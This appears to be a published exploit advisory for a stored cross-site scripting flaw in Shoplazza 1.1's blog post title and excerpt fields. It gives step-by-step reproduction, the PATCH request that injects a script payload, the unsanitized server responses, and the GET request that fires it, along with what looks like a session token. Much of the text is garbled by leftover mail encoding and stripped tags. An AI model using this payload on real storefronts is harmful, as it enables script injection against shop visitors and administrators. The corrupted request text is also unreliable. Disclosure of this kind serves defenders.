Title"><script>alert(1)</script>

# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) # Exploit Author: Andrey Stoykov # Software Link: https://github.com/Shoplazza/LifeStyle # Version: 1.1 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post" 3. Select "Title" and enter payload "> // HTTP POST request showing XSS payload PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1= .1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] {"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\">alert(1)","excerpt":"Excerpt\">","c= ontent":"

\">

"[...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=3Dutf-8 [...] {"article":{"title":"Title\">","excerpt":"Excerpt\= ">","published":true,"seo_title":"Title\">"[...] // HTTP GET request to trigger XSS payload GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9= .eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC= 03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK= Enfj9L49I HTTP/1.1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: text/html; charset=3DUTF-8 [...] Title"><script>alert(1)</script> [...] --rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--